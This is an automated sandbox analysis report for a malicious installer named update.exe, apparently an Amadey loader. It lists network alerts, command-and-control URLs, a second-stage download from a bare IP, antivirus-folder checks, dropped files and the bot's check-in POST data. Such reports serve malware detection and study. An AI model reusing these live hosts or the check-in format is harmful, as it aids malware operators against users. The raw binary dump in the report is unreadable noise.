popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

update.exe

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 23, 2021, 6:13 p.m. April 23, 2021, 6:36 p.m.
Size 2.4MB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7806508028c78ff39211cdfe01a070ef
SHA256 0590cd6ecc0865f09c48eea98b04ff75fb49918eb14c0b0c53ce8215650acce3
CRC32 4824B57A
ssdeep 49152:Y7mY8pH4TXwyAuFjkzxF3uDfxKqj/qSmJYPKWOn6/YiM:Km34TXOgGxNuDfxKqjDyWQGYiM
Yara
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check
  • HasRichSignature - Rich Signature Check
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_private_profile - Affect private profile
  • win_files_operation - Affect private profile

Name Response Post-Analysis Lookup
api.faceit.com
A 104.17.63.50
A 104.17.62.50
104.17.63.50
IP Address Status Action
104.17.62.50 Active Moloch
164.124.101.2 Active Moloch
176.121.14.159 Active Moloch
185.215.113.67 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.67:80 -> 192.168.56.101:49210 2400023 ET DROP Spamhaus DROP Listed Traffic Inbound group 24 Misc Attack
TCP 192.168.56.101:49225 -> 104.17.62.50:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49210 -> 185.215.113.67:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 192.168.56.101:49228 -> 185.215.113.67:80 2027700 ET MALWARE Amadey CnC Check-In Malware Command and Control Activity Detected
TCP 176.121.14.159:80 -> 192.168.56.101:49211 2400021 ET DROP Spamhaus DROP Listed Traffic Inbound group 22 Misc Attack
TCP 192.168.56.101:49211 -> 176.121.14.159:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 176.121.14.159:80 -> 192.168.56.101:49211 2014819 ET INFO Packed Executable Download Misc activity
TCP 176.121.14.159:80 -> 192.168.56.101:49211 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.121.14.159:80 -> 192.168.56.101:49211 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 176.121.14.159:80 -> 192.168.56.101:49211 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 104.17.62.50:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://185.215.113.67/4dcYcWsw3/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://176.121.14.159/build.exe
request POST http://185.215.113.67/4dcYcWsw3/index.php
request GET http://176.121.14.159/build.exe
request POST http://185.215.113.67/4dcYcWsw3/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72902000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libxml4.dll
file C:\Users\test22\AppData\Local\Temp\build.exe
file C:\Users\test22\AppData\Roaming\FastStoneSoft\FastStoneImageViewer.exe
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libbonjour.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libogg-0.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\zlib.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libEGL.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgraph31.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libpangoft2-1.0-0.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgcc_s_sjlj-1.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libbonjour.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libEGL.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libxml4.dll
file C:\Users\test22\AppData\Roaming\FastStoneSoft\libgraph31.dll
file C:\Users\test22\AppData\Local\Temp\build.exe
file C:\Users\test22\AppData\Roaming\FastStoneSoft\FastStoneImageViewer.exe
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $PELµ§^à  xË&@` ¤? ü˜ (° ˜‡@ øŠ ȉ @` ¬.text}wx `.dataX|@À.pubazeg0 –@À.lawy@ ˜@À.tls P š@À.new B` Dœ@@.rsrc˜‡° ˆà@@.reloc¶@ h @BVD$P‹ñè| ÇôaK‹Æ^ÂÇôaKé V‹ñÇôaKè öD$tVèºY‹Æ^‹D$Š‹L$ˆËD$PŠ@„Éuù+ÂÃU‹ìÿuÿuÿu ÿu茋EƒÄ]ÃU‹ìÿuÿuÿu ÿuè ‹EƒÄ]ÉÃj¸+‡Hè‹ñ‰uðèà ƒeüÿuN ÇbKèù‹ÆèÃÂV‹ñjjN ÇbKè‹Î^éÀ ƒy$r‹AÍAÃV‹ñèÍÿÿÿöD$tVèåY‹Æ^ÂVÿt$‹ñèxÿÿÿÇbK‹Æ^ÂÇbKé–ÿÿÿV‹ñÇbKèˆÿÿÿöD$tVè Y‹Æ^Âj¸+‡HèP‹ñ‰uð‹}Wè ƒeüƒÇ WN ÇbKè3‹ÆèýÂÙîÙÀÙóÃV‹ñjÇFèîÿt$‹Îè'‹Æ^ÂV‹ñjÇFèÌjÿjÿt$‹Îèo‹Æ^ÂjjèÃyr‹AÍAËAÃj¸N‡Hè«‹uQ‰e‹Æ‰eèƒ3À‰F ‰F‰F‹Æè`ÂV‹ðè@ÿ6è³Y^Ãÿ0è©YÃU‹ì‹E SVW‹}‹Ù9Gs萋w‹E +ð9us‹u‹Ë;ßujÿðVè§ÿu ‹Ëjè›ëCjVè„Àt7ƒr‹ëƒÇ‹Kƒùr‹CëC‹U VúWQPè”ýÿÿƒÄV‹ËèÅ_^‹Ã[] ‹D$V‹ñPŠ@„Éuù+ÂPÿt$ ‹Îè¼^€|$V‹ñt+ƒ~r%ƒ|$ FW‹8vÿt$WjPè3ýÿÿƒÄWè¿Y_ÿt$ ‹ÎÇFèR^‹ÁÃV‹ðþI’$ vèÕjè köðY‰G ‰G‰w°^ËF …Àtÿvèÿv ècYYƒf ƒfƒfÃU‹ìQVQ‰eü‹ð‰eüèÁ‹Æ^ÉÂU‹ìVW‹}W‹ñèׄÀtƒ~r‹FëFÿu +øWV‹Îècþÿÿë:jÿu ‹Î迄Àt(‹Nƒùr‹FëFÿu WQPèHüÿÿƒÄÿu ‹Îèw‹Æ_^]ÂU‹ìVW‹}‹ñ9~s赋F+Ç;E s‰E ƒ} v@‹NSVƒùr‹ë‹Úƒùr‹+E ß] PS+ÏQ×Rèúûÿÿ‹F+E ƒÄP‹Îè [_‹Æ^]ƒy‹D$‰Ar‹IëƒÁÆÂVW‹|$ ‹ñƒÿþvèô9~s ÿv‹ÎWèæë-€|$tƒÿs‹F;øs‹ÇPj‹Îèþÿÿë …ÿuW‹Îè“ÿÿÿ3À;ÇÀ_÷Ø^Âÿt$èÖ Y¸I’$ Ãÿt$èõYÂjD¸Ò†Hèvh,‰KMØèNüÿÿƒeüEØPM°è<ûÿÿh°—KE°PÇE°bKèóÌ3ÉAèÊ…Àt‰0ë3À‰‹ÆÂjèßYÃÿt$èU YÂVÿt$‹ñè¬ûÿÿÇbK‹Æ^ÂjþXÃj ¸‡Hè‹ù‰}è‹uƒÎƒþþv‹uë%3Òj‹Æ[÷ó‹O‰MìÑmì‹Uì;Âs jþX+Â;Èw4 ƒeüFjPèwYY‹Øë*‹E‰eð‰E@jPÆEüè[Y‰EìY¸@@Ë}è‹u‹]ìƒ} vƒr‹GëGÿu PFPSèùùÿÿƒÄjj‹ÏèŽüÿÿÿu ‹Ï‰_‰wèþÿÿè‹Mè3öVjèiüÿÿVVèÆ̃|$Vt-‹qAƒþr‹ë‹Ð9T$rƒþr‹‹IÈ;L$v°ë2À^Â3ÉAébjÿt$èœYYƒÈÿÃébùÿÿéyùÿÿÃU‹ìƒÈÿ3Ò÷ñƒìƒøs%ƒeüEüPMðè_hè—KEðPÇEðôaKè,kÉQè0 YÉÃU‹ìƒÈÿ3Ò÷ñƒìƒøs%ƒeüEüPMðèhè—KEðPÇEðôaKèé‹ÁÁàPèë YÉÃU‹ì‹Mƒì …Éw 3ÉQèÓ YÉÃÈÿ3Ò÷ñƒøsëƒeEPMôèÅhè—KEôPÇEôôaKè’ÌVÿt$‹ñèÇôaK‹Æ^ÂQŠD$YÃÿt$ÿt$ÿt$ÿt$èVøÿÿƒÄÃÿt$ÿt$ÿt$ÿt$èYøÿÿƒÄÃV‹ðë VèƒÆ;t$uñ^Ãé ÿt$èËL$jjèªúÿÿ‹D$Âÿ%`Kÿ%`Kÿ%`Kÿ% `Kÿ%`Kÿ%`Kÿ%`Kÿ%`Kÿ% `Kÿ%$`Kÿ%(`Kÿ%,`Kÿ%0`Kÿ%4`Kÿ%8`Kÿ%<`Kÿ%@`Kÿ%D`Kÿ%H`Kÿ%L`Kÿ%P`Kÿ%T`Kÿ%X`Kÿ%\`Kÿ%``Kÿ%d`Kÿ%h`Kÿ%l`Kÿ%p`Kÿ%t`Kÿ%x`Kÿ%|`K‹ÿU‹ìVÿu‹ñèk÷ÿÿÇ bK‹Æ^]ÂÇ bKéˆ÷ÿÿ‹ÿU‹ìV‹ñÇ bKèu÷ÿÿöEtVèŽ Y‹Æ^]‹ÿU‹ìVÿu‹ñè÷ÿÿÇ$bK‹Æ^]ÂÇ$bKé9÷ÿÿ‹ÿU‹ìV‹ñÇ$bKè&÷ÿÿöEtVè? Y‹Æ^]ÂjD¸Ò†Hèîh,bKMØèÆ÷ÿÿƒeüEØPM°è0÷ÿÿh°—KE°Pèr ÌjD¸Ò†Hè¶h<bKMØèŽ÷ÿÿƒeüEØPM°èPÿÿÿhäKE°Pè: ÌjD¸Ò†Hè~hTbKMØèV÷ÿÿƒeüEØPM°èÉþÿÿh ŽKE°Pè ̋ÿU‹ìVÿu‹ñèæöÿÿÇ bK‹Æ^]‹ÿU‹ìVÿu‹ñèÉöÿÿÇ$bK‹Æ^]Â; АHuóÃé‹ÿU‹ì‹EVW3ÿ;ÇtG9}uèaj^‰0WWWWWèσċÆë)9}tà9E sè<j"Y‰‹ñë×PÿuÿuèÉƒÄ 3À_^]ËÿU‹ì‹EV3ö;Æuè VVVVVÇèwƒÄ3Àë‹@ ƒà^]ËÿU‹ì‹EV3ö;ÆuèÖVVVVVÇèCƒÄ3Àë‹@ ƒà ^]ËÁƒ`ƒ`ÇpbKËÿU‹ìS‹]VW‹ùÇpbK‹…Àt&Pè8 ‹ðFVè—YY‰G…Àtÿ3VPèTƒÄ ëƒgÇG‹Ç_^[]‹ÿU‹ì‹Á‹MÇpbK‹ ƒ`‰H]‹ÿU‹ìS‹
request_handle: 0x00cc000c
1 1 0
host 176.121.14.159
host 185.215.113.67
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=152138328664&vs=2.15&sd=7ea3f0&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0
1 1 0